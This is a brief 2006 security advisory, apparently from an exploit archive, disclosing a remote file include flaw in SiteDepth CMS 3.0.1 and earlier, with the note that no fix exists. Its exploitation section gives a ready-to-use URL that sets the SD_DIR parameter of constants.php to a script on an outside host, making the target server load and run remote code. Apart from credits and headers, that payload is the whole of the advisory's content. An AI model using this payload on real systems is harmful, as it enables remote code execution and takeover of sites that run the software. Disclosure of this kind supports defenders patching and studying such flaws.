SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability

2006-07-20 00:00:00

Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.